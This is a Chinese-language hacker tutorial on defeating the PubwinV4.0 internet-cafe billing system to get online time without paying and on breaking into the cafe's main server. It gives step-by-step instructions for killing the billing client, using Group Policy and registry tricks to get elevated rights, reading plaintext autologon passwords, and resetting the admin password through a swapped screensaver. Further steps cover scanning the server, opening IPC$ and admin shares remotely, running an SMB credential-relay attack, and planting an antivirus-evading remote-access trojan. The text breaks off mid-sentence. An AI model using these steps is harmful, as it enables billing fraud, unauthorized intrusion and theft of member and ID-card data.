我与PubwinV4.0(闲谈网吧破解之路)(ForBbsblue与"百无禁忌V1.4")
以后可能不再做这些技术文档了,唉人生....做安全人员难,黑客容易多了....
本文所有人转载必需说明出处和作者名,其中所有工具都打包在"百无禁忌"(我收集的N多小工具并起的名)里.
经验告诉我们无论任何网管程式所在路径皆不得含有中文名称
我们知道网管程式升级后都会有数据库备份,我们则可以从此处着手,(学SQL的都知道我们无论如何都无法在Pubwin运行的情况下拿下它的数据库,因为它正在运行)比如Pubwin2007升级安装前,需要备份PubwinEP数据库文件、数据库自动备份文件及会员照片。
还讲下这个,就是万象也可以升级到Pubwin的,万象2004的数据库是Access数据库好像,不过数据库转换器到处都是所以说网管门都不会重装网管程式的,任何网管程式都可以相互升级转换,主要就是数据库问题.
讲下默认路径:
1.PubwinEP数据库文件默认路径:
X:\Hintsoft\PubwinServer\database下的“local_Data.MDF”、“local_log.LDF”
Pubwin4.0有可能的几种路径:
X:\ProgramFiles\Hintsoft\Pubsrv\Database\Member.mdb
X:\ProgramFiles\Hintsoft\Database\Member.mdb
X:\Hintsoft\Pubsrv\Database\Member.mdb
2.数据库备份文件默认路径
X:\Hintsoft\PubwinServer\appServ\server\webapps\NetCafe\backup\longtermdata下的“local_db.dbbak”文件。
3.会员照片的默认路径
X:\Hintsoft\PubwinServer\appServ\server\webapps\NetCafe\headphotos(会员头像照片)
X:\Hintsoft\PubwinServer\appServ\server\webapps\NetCafe\photos(身份证照片)下的所有文件。
好了经验讲到这里我得说下面几条:(由于目前我的实验环境有限走完几条街也都是PubwinV4.0,下面都主要针对Puwbin4.0来讲的,另外我都是用会员上机卡来实验的)
第一、大家得知道我们并不必要破解Pubwin,严格来说我们不能叫破解它,因为真的破了它网管只好升级网管程式了;我们要做的是脱管或自己冲钱.
第二、大家也有想拿下网吧路由器的,入侵邻机的,入侵主机的人数不少不过大家要知道网管不是省油的灯现在都不是以前那种“网管机器有问题这个游戏不能玩啊机器死机啊卡啊QQ上不了啊,然后网管跟你说重启,唉!还是不行啊,然后他又说给你换机,你再说还是不行啊这都在干些什么啊什么网吧,然后他终于对收银台MM说句:看看他上了多久退款....”垃圾网管的时代了.
先讲讲脱管吧我一条一条说:
1.我们用任何程式干掉Pubwin并在一秒内删除机器上的Puwbin4.0安装目录(你只删除Pubwin4.0这个程序也可以);(安全级别:超危!)
2.我们屏蔽Pubwin4.0,用"Windows防锁专家"这个小软件就能行;(安全级别:低,主机显示此机无人并且每几分钟屏幕会回到桌面闪一下,并且桌面有可能是假的点不动无任务栏.闪是因为Pubwin每隔几分钟锁定一次桌面而Windows防锁专家又屏蔽了它)
3.我们欺骗Pubwin4.0,就是我常用的方法,做得快的话说不定主机显示此客机上有人并且正在计费!(提下方法具体可以看我发在黑客动画吧的教程)
这个方法其实就是扩充了网上流传的"开一台机器后断掉本机的网然后开另台机器马上到另台客机上登陆卡号并点下机再回本机恢复网络"这里有几点要注意,首先有可能只有一个文件夹有权限让你写入和读取也就是让你双击打得开,也有可能你看到的桌面是假的,是Pubwin虚拟出来的.所以我们必需提权,因为只有提权才是最快拿到磁盘读写权限的方法,我们提权做什么呢?当然你的网吧也有可能有个SB网管你不仅可以打开"任务管理器"还可以打开"运行"还有系统只有一个管理员账户并且就是你现在正在上机的这个......多的可能性我也不多说了,一切皆有可能.
上次那个教程发出去后大家都说我做得太快了,其实大家给教程换个单播并不快的,Gpedit.msc是一个很好用的XP自带提权必备工具,也是网管不得不删除的一个头痛工具要么他加上权限,其实大家不要把网管都想得太简单了,大家可能双击后无反映不说还有可能双击后丢一句说什么网吧禁止使用,更有甚之双击后说要密码,要密码是不可能的,因为你们可以用我发过的百无禁忌那个工具集,我会常常更新它,有空也会加上详细说明.Gpedit.msc打不开的原因有三种;第一就是网管用了别的什么程式屏蔽了它,第二就是网管对Gpedi.msc所须要调用的DLL文件设了权限,奇怪吧,一点也不要惊奇这是权限应用高手所作的,网吧一般都用XP是吧也都是XP的专业版,在C:\Windows\system32下的很多有用程序都是要调用DLL文件的网管设为不让你调用这些DLL文件你真的哭笑不得,不过网吧一般会关了Windows文件保护,大家知道这样就不好搞了,不怕我给大家找了那个XP-Home版升Pro版用的(用脚本安装的Gpedit.msc),带全部的DLL安装后一定可用,如果真的不能用那一定是网管加了什么别的程序在屏蔽这些工具.(还有可能网管删除了它...)
废话也不说,讲讲那个"组策略"的设置目地,
第一:防止系统关机,(用Windows防锁专家也可以)
组策略->计算机配置->Windows设置->安全设置->本地策略->用户权利指派->在右边找到"关闭系统",把里面所有账户都删除并应用
组策略->计算机配置->Windows设置->安全设置->本地策略->用户权利指派->在右边找到"更改系统时间",把当前账户和Admin都加进去.
第二:打开一些限制:
组策略->用户配置->管理模板->Windows组件->Windows资源管理器->在右边找到"关闭Windows+X热键".设为禁用
组策略->用户配置->管理模板->Windows组件->Windows资源管理器->在右边找到"防止从'我的电脑'访问驱动器",设为禁用
组策略->用户配置->管理模板->Windows组件->Windows资源管理器->在右边找到"隐藏'我的电脑'中的这些驱动器",设为禁用
组策略->用户配置->管理模板->Windows组件->Windows资源管理器->在右边找到"从资源管理器上删除搜索按钮",设为禁用
组策略->用户配置->管理模板->任务栏和「开始」菜单->在右边找到"从「开始」菜单删除'运行'菜单",设为禁用
组策略->用户配置->管理模板->任务栏和「开始」菜单->在右边找到"删除和阻止访问'关机'命令,设为启用
组策略->用户配置->管理模板->系统->在右边找到"阻止访问命令提示符",设为禁用
组策略->用户配置->管理模板->系统->在右边找到"阻止访问注册表编辑工具",设为禁用
组策略->用户配置->管理模板->系统->Ctrl+Alt+Del选项->在右边找到"删除注销",设为禁用
组策略->用户配置->管理模板->系统->Ctrl+Alt+Del选项->在右边找到"删除'任务管理器'",设为禁用
好了,基本上已经完了,这里面有很多地方设了后系统变得很有意思,你们慢慢玩也可以.
现在我很少见到不让IE下载的垃圾网吧了不过还是说下这个:
IE浏览器分级审查的密码可以运行“regedit.exe”,打开注册表数据库把“HKEY_LOCAL_MACHINE”→“Software”→“Microsoft”→“Windows”→“CurrentVersion”→“Policies”→“Ratings”下的"key"删除。
下面我们再用Compmgmt.msc来把管理员账户密码设为空.(这个程式就是右击"我的电脑"中的"管理"网吧一般没有.)近日我想起其实每个网吧都喜欢用自动登陆,那么如果你那里打得开注册表编辑器的话那就好说了,因为一般网吧不会在注册表里玩什么权限那多麻烦是不是,还记得注册表提权么,也就是把HKEY_LOCAL_MACHINE\SAM\SAM设个权限给Administrators后再把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下面的键值对应Names换下同,比如把Administrators的权限值换到Jack的值下,注销后提权成功;这种提权法不是不成,不过会导致一些软件不可用,比如QQ会因为管理员账户变更而说"本机QQ已达上限"而无法使用QQ,我说下注册表其实有个地方会以明文形式告诉大家:
网吧使用自动登陆后用户密码存放在此处:
HKEY_LOCAL_MACHINE->SOFTWARE->Microsoft->WindowsNT->CurrentVersion->Winlogon
DefaultUserName和DefaultPassword分别是用户名和密码.
也可以这样,你给网吧机设成Windows徽标的那个屏保程式,实没有屏保也可以去网上随便下载一个,不过那样在用下面的方法时路径要改.
说下用屏保破Windows密码的方法:
C:\Windows\system32\logon.scr(不一定是Logon.scr,看当前用的是什么屏保文件,也不一定是这个路径)替换为cmd.exe或者explorer.exe,然后在系统登陆处等待,过一会,系统就会去运行logon.scr这个屏保,因为你替换了这个屏保文件,所以实际上运行的是cmd.exe或者explorer.exe,并且是用localsystem权限,于是你可以随便了,最简单的就是在cmd.exe里运行netuseradministrator"",成功后管理员密码也被清空了,关闭cmd或者explorer就可以用空口令登陆了。
OK现在权限提完了,做得快的十五分钟也估计用完了,慢的半小时也够了,再慢你一个小时也够了,现在说下大家看到这里后的成果:
你拥有管理员账号和密码,打开了一般你需要用到的所有权限.好现在你注销后再用Administrator(因网吧不同用账户的可能不一样)登陆,或者你想说你现在这个就是管理员,那你也注销,因为Windows提权啊改系统属性什么的事都不是要重启就是要你注销(超烦...)
现在你注销完了,OK你再看是不是什么都能用了;不一定吧,有很多网吧都会加上N多烦人的东东再限制大家,比如游戏同步程序中就有一个出名的假explorer程序来限制大家打开和运行带有指定字符串的网页或程序,还有网吧同步专家的那个SE什么Bar的那个也能限制迅雷啊什么的运行,并且还有Pubwin4.0自带的Relock,黄瓜军团的什么程式了,不过不要怕记不住这些示知进程,按我说的你有%80的机会不重启拿到干净的系统并能使用迅雷,记住下面这些东东:
不能杀的进程:!
system(kernelexecutiveandkernel)
smss(sessionmanager)
csrss(win32subsystem)
winlogon(logonprocess)
services(servicecontrolmanager)
lsass(localsecurityauthenticationserver)
正常的用户权限运行进程:!
explorer.exe占用内存一般至少十三MB,常为二十多MB
iexplore.exeIE6.0和7.0都是这个名字开一个窗口最少有一个,如果只开一个窗口有两个三个的那么就中毒了.
conime.exe命令提示符的中文输入支持,习惯性的见到就杀,一点用都米得...很少到DOS下打中文.
QQ.exe开几个有几个不用说了吧
TIMPlatform.exe有木马专门仿这个程序本来是正常进程的,大家见了就杀,反正没什么用貌似是用来限制一机只能登一个号一次的.
notepad.exe记事本
TTPlayer.exe千千静听
Pubwin.exePubwin4.0的进程表杀了啊
Taskmgr.exe任务管理器进程
SOUNDMAN.EXE声卡相关程序没必要结束,我没结束过
VM_STI.EXE摄相头驱动
internat.exe输入法状态显示用的
ctfmon.exe同上
svchost.exe(XP在正常情况下应是五个最多也就是六个,多了就是装出来的,这是最头痛的只能靠运气谁知道七八个里哪几个是假的)
如果任何一个被杀掉或者出错,系统将重新启动.至于其他的你%90都可以杀,杀不了就用"ntsd-pPID进程号"来杀,再杀不了用冰刃、金山毒霸反正你要知道有N多东东能强杀进程就行了.不过你还记住一句话用户权限运行的系统进程名一定是毒或限制程式.不认识的------->杀!!
杀完后机器快多了还爽多了是不是,呵呵现在是不是在谢我?
现在我们讲下机.你现在用软件也可以直接把本地连接禁用也行拔网线也可以,把本机网断掉就是了,再去换机到别的机器上机然后点结账下机,OK再回来本机开始上网冲浪之旅.(打得好累,详细吧?)
现在我们再来讲讲网吧主机的简单入侵.
用到的工具有:
X-ScanV3.3Cmd.exe(废话...)我的百无禁忌V1.3(这些工具有空我会在此文载到网上后一周内全打包成V1.4版)
1.去网吧开台干净的机器,就是说先完成上面的,不过你没事也就不用非法上机了,现在再入侵主面就叫作非法上的非法....
2.判断对方上网的路由有几跳,开个DOS窗口(这个不用说吧?)键入TRACERTXX.XX.XX.XX
3.得到对方电脑的名称,开个DOS窗口
键入NBTSTAT-AXX.XX.XX.XX
第一行是对方电脑名称
第二行是对方电脑所在工作组
第三行是对方电脑的说明
4.你用百无禁忌里的Pubwin破解精灵破了Pubwin的管理密码,然后由Pubwin的系统设置里得到主机的IP,这是快方法慢的你就用别的慢慢扫吧
5.你打开X-ScanV3.3狂扫主机,什么都不用改只要设好要扫的IP就成了,其他全部默认.看你机器的配置了,不过是非法上机的时间就不是问题,要的是耐心...
4.等扫出来已后如果扫不到NT-Server密码的朋友就此罢手,因为本人也在正在想办法搞这个事,不过如果网管垃圾少打了补丁你甚至也可以用MS0411溢出什么的MS漏洞溢出主机.
5.扫出139端口,445端口没有封的朋友现在打开注册表编辑器,(貌似不要139我也连上了)并连接到主机的注册表,现在你有几件事做:
1.通过修改注册表来打开建立空连接(IPC$)
点击[开始]→[运行],在运行框里输入“Regedit”回车后打开注册表,
将HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA的RestrictAnonymous项设置为“0”
2.通过修改注册表来开启管理共享C$D$等
打开注册表的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters项
对于服务器,添加键值“AutoShareServer”,类型为“REG_DWORD”,值为“1”。
对于客户机,添加键值“AutoShareWks”,类型为“REG_DWORD”,值为“1”.
(不过注册表开的共享只能重启后有效...要当时有效请往下面看...你也可以用Opentelnet开,不过我不喜欢用那个)
你会问为什么可能远程改注册表是吧,X-Scan里面扫完的报告里应有这句话的,它会提到SMB,我自己也不记得SMB怎么定义的只知道它有漏洞.
那么这样我给大家一句话:能开445和139端口你就有机会远程开对方注册表并修改.
引用下139端口对SMB的说明:
Windows访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。
下面是SMB的密码认证方式。
WINDOWS的139口的访问过程,箭头表示数据方向:
1.客户端<--------------------建立TCP连接----------------->服务端
2.客户端-------客户端类型、支持的服务方式列表等---------->服务端
3.客户端<---------服务器认证方式、加密用的key等-----------服务端
认证方式就是用户级认证还是共享级认证和密码加密不,key是服务器随机生成的8个字节,WIN2000已经支持16个字节的key。
4.客户端--------------用户名、加密后密码----------------->服务端
WIN9X、WINNT、WIN2000这有个漏洞,不经过提示等就把当前用户名,密码加密后发过去了,导致密码泄漏。这儿加密是DES的变形,lockedpass=chgdes(key,pass)。这儿的pass是作为DES变形的KEY,key是作为DES变形的待加密数据。
5.客户端<---------------认证成功否-----------------------服务端
WINDOWS客户端第4步有漏洞,显然服务端可以得到username和lockedpass=chgdes(key,pass),其中key可以自由指定,因为这是服务方提供的,usname、pass是客户端当前访问者用户名和密码。这儿的加密变换不可逆,但已经可以用暴力法破解了,也已经有了这样的程序。其实我们有时并不一定要得到密码明文的,只要能提供连接需要的就可以了。我们来看得到lockedpass有什么用,我们反过去访问看看,telnet、ftp等连接要密码明文我们得到的lockedpass不能提供,那么我们考虑用同样加密算法传密码密文的服务呢?比如就是NETBIOS共享服务。前面是服务端得到东西,那现在就是站在客户端了,再看前面那过程,显然其实我们并不需要提供pass,是不是只需要提供username和lockedpass2=chgdes(key2,pass)就可以了?其中key2是现在的服务端提供的。看看我们有usname和lockedpass=chgdes(key,pass)其中key我们可以自己指定,大家一看显然只要key=key2那么就需要的我们都有了是不是?所以我们要使得key=key2.
好我们再仔细看看连接过程,别人连接两步1、2:
1.客户端<--------------------建立TCP连接----------------->服务端
2.客户端-------客户端类型、支持的服务方式列表等---------->服务端
下面就该
3.客户端<---------服务器认证方式、加密用的key等-----------服务端
这我们需要提供key,这儿我们不能随便提供key,需要提供key2,那么我们就要得到key2,显然需要连接NETBIOS服务回去。显然这而需要连接回去的11,22,33共3步(为了区分连接回去的步子用重号表示)才能得到key2,显然这2步和3步不需要有先后顺序。所以我们可以得到连接指定IP的NETBIOS服务然后等这用户来访问,这可能有时间超时等处理,或者等到任意IP连接NETBIOS服务后马上连回去,反正怎么处理方便、满足需要就怎么处理。
下面显然就是设置key=key2返回3,那就等4得到lockedpass了,第5步嘛就你自由处理了,要不返回密码错误,后面就是44、55……
总的来就是1,2,11,22,33,3,4,5,44,55……显然你就是以那机器访问你的用户的身份去访问他的NETBIOS服务了,能干什么那就看那用户的权限了。
注意有兴趣的可以把SAMB包的客户端程序修改加上一点服务的前几步就可以了。显然这主要利用的还是WINDOWS泄露当前用户名、加密密码漏洞。还有这需要别人来访问你的机器,这好办,邮件或者主页等里面来个
IMGsrc”="file://ip/filename"...
就可以了。我实验了去掉机器139口服务(要不有139口要影响后面端口重定向),用端口重定向程序把来向139口定向回去,找另一个WINNT机器用
file://ip/访问那重定向139口的机器,结果是没有密码提示就看到WINNT机器本身了。其实这时重定向端口程序那台机器已经用WINNT机器的当前用户访问WINNT了,只是由于没有客户端的处理界面不能操作。
好了扫出"NT-Server空密码,账号:Administrator"的朋友现在请打开"百无禁忌"里的"网吧远程开启默认共享脚本"那个BAT文件,右击编辑下把里面的"192.168.0.166"这个IP换成你的网吧主机IP,并更改用户名和密码,(要有IPC$命令的基础知识,例:netuse\\对方主机IP\IPC$"密码"/user:"用户名")然后双击,闪一下后关闭这个DOS窗口,然后你再打开"网吧远程开启默认共享脚本"所在文件夹下刚生成的"Share.bat",OK一分钟后主机的默认共享已开启,你映射为本地盘就好了,现在你做个免杀的鸽子传上去为最后,因为我喜欢鸽子的简单易用.你用Radmin也行,用AngelShellVer1.0也可以,最主要是你自己要会,这些再详细讲那不知道多长了,自己去百度里找这些技术文档.
6.一般我会映射为本地Z盘,现在你打开他的D盘,(一般都在D盘可能性要大,网管会在C、D、E、F甚至更多的盘装N个Pubwin的文件夹来迷惑你,不要怕你只要找这些文件夹下的Database下的Memeber.mdb,对比大小就成,一般最少也有个五六MB不然就一定是假的,再就是有些网管每天都会对账会做一些带日期的数据库小型备份一看日期比较早的就看都不要看了,不过可以用作COPY出来给"Access数据库密码破解专家"用于破数据库密码用),映射完D盘后你打开你这边的Z盘就是主机的D盘,我这边实验"用"的Win2003(网吧装的
当前位置:
